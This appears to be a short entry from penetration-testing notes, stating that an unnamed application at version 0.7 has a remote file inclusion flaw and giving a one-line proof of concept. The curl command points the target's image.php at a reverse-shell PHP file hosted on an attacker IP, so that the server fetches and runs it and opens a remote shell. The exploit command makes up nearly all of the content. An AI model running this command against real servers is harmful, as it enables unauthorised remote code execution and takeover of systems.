There is a RFI vulnerability in version 0.7 with an available PoCarrow-up-right:
0.7
$ curl -s "http://<target-IP>/image.php?img=http://<attacker-IP>/revshell.php"
Last updated 6 months ago
